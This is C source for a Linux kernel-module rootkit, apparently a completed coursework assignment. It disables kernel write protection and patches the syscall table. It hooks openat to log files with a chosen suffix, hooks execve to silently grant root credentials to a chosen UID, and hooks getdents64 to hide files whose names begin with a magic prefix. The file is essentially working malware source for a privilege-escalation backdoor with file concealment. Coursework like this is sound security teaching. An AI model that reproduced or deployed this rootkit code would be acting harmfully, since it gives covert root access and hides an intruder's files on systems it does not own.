/*
 * COMP4108 Rootkit Framework
*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>

#ifndef __NR_getdents
#define __NR_getdents 141
#endif
#define MODULE_NAME "rootkit"

// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function

/*
 * TODO: NEEDED FOR PART B AND C
 *  create a variable as above to store the original execve and getdents64 functions
*/
static t_syscall original_execve; // create a variable to store the original execve function
static t_syscall original_getdents64; // create a variable to store the original execve function


/*
 * The suffix to use for the openat hook code. This is the file extension
 * we will be detecting. See insert.sh for how this is passed to the rootkit.
*/
static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

//******
//TODO: NEEDED FOR PART B
//	Accept root_uid as a kernel module parameter 
//	(see module_parm() example above)
//******
/*
 * When a user with an effective UID = root_uid runs a command via execve()
 * we make our hook grant them root priv. root_uid's value is provided as a
 * kernel module argument.
 */
static int root_uid;
module_param(root_uid, int, 0);
MODULE_PARM_DESC(root_uid, "Received root_uid parameter");

//******
//TODO: NEEDED FOR PART C
//	Accept magic_prefix as a kernel module parameter
//	(see module_parm() example above)
//******
/*
 * Files that start with a prefix matching magic_prefix are removed from the
 * linux_dirent64* buffer that is returned to the caller of getdents64()
 */
static char* magic_prefix;
module_param(magic_prefix, charp, 0);
MODULE_PARM_DESC(magic_prefix, "Received magic_prefix parameter");

/* 
 * TODO: NEEDED FOR PART A
 *  Update the string provided to the kallsyms_lookup_name function
 * 
 * Locates the address of the system call table using kallsyms_lookup_name
 * and returns it as an unsigned long *
*/
unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
  return syscall_table;
}


/*
 * Our version of the symscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix);
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }

  kfree(filename);

  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}


//TODO: PART B execve func
/*
* int execve(const char *filename, char *const argv[], char *const envp[]);
* execve() executes the program pointed to by filename. 
* filename must be either a binary executable, 
* or a script starting with a line of the form:
*/
asmlinkage int new_execve(const struct pt_regs* regs){
  long ret;
  char *filename; //used to print filename of proccess be executed by execve
  int euid; //used to print euid of user making the syscall for execve
  struct cred *credentials; 

  // alocate kernel memory
  filename = kmalloc(4096, GFP_KERNEL); 

  // copy the filename into the kernel variable,
  if (strncpy_from_user(filename, (void*) regs->di, 4096) < 0){
    //if the copying fails free the space and return
    kfree(filename); 
    return 0;
  }

  //print the name of all files being executed
  printk("Executing %s\n", filename);

  //print effective UID of the user executing the file to syslog 
  euid = current_euid().val;
  printk("Effective UID %d\n", euid);

  //when the effective UID of the user executing an executable is equal to the value of the root_uid 
  if(euid == root_uid){
    //give uid/euid 0 (i.e. root privs)

    //Prepare a set of credentials for a kernel service
    credentials = prepare_kernel_cred(NULL);

    //Install new credentials upon the current task
    commit_creds(credentials);
  }

  //free kernel memory
  kfree(filename);

  // Invoke the original execve syscall
  ret = original_execve(regs);

  return ret;
}

//TODO: PART C getdents64 func
/*

int getdents64(unsigned int fd, struct linux_dirent *dirp, unsigned int count);

Arguments
  fd:unsigned int - file descriptor of an open directory.
  dirp:struct linux_dirent64* - pointer to a buffer where the results are written.
  count:unsigned int - size of the buffer pointed by dirp.

Return
  On success, the number of bytes read is returned.
  On end of directory, 0 is returned. 
  On error, -1 is returned, and errno is set appropriately.
*/
asmlinkage int new_getdents64(const struct pt_regs* regs){
  long ret;
  struct linux_dirent64 *buffer; // used to copy directory list to kernel
  struct linux_dirent64 *d; // used to iterate through directory list
  int bpos; // used to iterate through list of directories
  int new_bpos = 0;
  int lengthPrefix = 0;

  // Invoke the original getdents64 syscall 
  ret = original_getdents64(regs);

  // Return because it's the end of file or an error
  if (ret <= 0) { 
    return ret;
  }


  // Allocate kernel memory
  buffer = kmalloc(ret, GFP_KERNEL);

  //grab the length of the prefix word for removing files that contatin it
  lengthPrefix = strlen(magic_prefix);

  // Copy the userland buffer into your kernel buffer using copy_from_user
  if (copy_from_user(buffer, (void *)regs->si, ret)) {
    kfree(buffer);
    return ret;
  }

  printk("getdents64() hook invoked.\n");
  // printk("FOUND ENTRY WITH PREFIX:%s\n",magic_prefix);

  // Loop through the directory entries
  for (bpos = 0; bpos < ret;) {
    d = (struct linux_dirent64 *)((char *)buffer + bpos);
    printk("entry: %s\n", d->d_name);
    bpos += d->d_reclen;  

    // if directory entry starts with magic_prefix remove it
    if (strncmp(d->d_name, magic_prefix, lengthPrefix) != 0) {
      // Copy the entire directory entry, including its filename and padding
      memcpy((char *)buffer + new_bpos, d, d->d_reclen);
      new_bpos += d->d_reclen;    
    }
  
  }

  //copy kernel space data to userspace
  copy_to_user((void *)regs->si, buffer, new_bpos);

  // Free the allocated memory
  kfree(buffer);

  // Return the result of the new getdents64 syscall
  return new_bpos;
}

/*
 * Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  /*
   * TODO: NEEDED FOR PART A, B, AND C
   *  Uncomment the following lines as needed to store the original functions
   *  before they are hooked. You will need to add lines for the execve and
   *  getdents64 functions.
  */

  // Let's store the original functions so they can be restored later
  original_openat = (t_syscall)__sys_call_table[__NR_openat];
  original_execve = (t_syscall)__sys_call_table[__NR_execve];
  original_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64];

  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();

  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */

  // Let's hook openat() for an example of how to use the framework
  __sys_call_table[__NR_openat] = (unsigned long) new_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Hook your new execve and getdents64 functions after writing them
  */

  // Let's hook execve() for privilege excalation
  __sys_call_table[__NR_execve] = (unsigned long) new_execve;

  // Let's hook getdents64() to hide our files
  __sys_call_table[__NR_getdents64] = (unsigned long) new_getdents64;

  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();
  
  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");

  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();

  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */
  // Let's unhook and restore the original openat() function
  __sys_call_table[__NR_openat] = (unsigned long)original_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Unhook and restore the execve and getdents64 functions
  */

  // Let's unhook and restore the original execve() function
  __sys_call_table[__NR_execve] = (unsigned long)original_execve;

  // Let's unhook and restore the original getdents64() function
  __sys_call_table[__NR_getdents64] = (unsigned long)original_getdents64;

  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();

  printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");